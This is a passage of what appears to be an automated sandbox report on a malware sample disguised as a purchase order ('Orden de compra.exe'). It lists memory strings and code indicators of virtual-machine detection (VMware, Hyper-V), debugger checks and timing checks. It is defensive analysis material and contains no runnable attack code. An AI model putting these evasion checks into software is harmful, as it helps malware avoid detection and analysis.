Source: explorer.exe, 00000005.00000002.607426206.00000000062E0000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: explorer.exe, 00000005.00000000.367290968.00000000082E2000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.367290968.00000000082E2000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.367465423.0000000008430000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmp; Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.359912940.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000005.00000002.593861267.000000000095C000.00000004.00000020.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\Orden de compra.exe; Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Process queried: DebugPort
Source: C:\Windows\SysWOW64\wscript.exe; Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00409A80 rdtsc 4_2_00409A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_0040ACC0 LdrLoadDll, 4_2_0040ACC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FB58EC mov eax, dword ptr fs:[00000030h] 4_2_00FB58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FB40E1 mov eax, dword ptr fs:[00000030h] 4_2_00FB40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FEF0BF mov ecx, dword ptr fs:[00000030h] 4_2_00FEF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FEF0BF mov eax, dword ptr fs:[00000030h] 4_2_00FEF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FF90AF mov eax, dword ptr fs:[00000030h] 4_2_00FF90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FE20A0 mov eax, dword ptr fs:[00000030h] 4_2_00FE20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FB9080 mov eax, dword ptr fs:[00000030h] 4_2_00FB9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_010369A6 mov eax, dword ptr fs:[00000030h] 4_2_010369A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_00FD0050 mov eax, dword ptr fs:[00000030h] 4_2_00FD0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_010351BE mov eax, dword ptr fs:[00000030h] 4_2_010351BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 4_2_010351BE mov eax, dword ptr fs:[00000030h]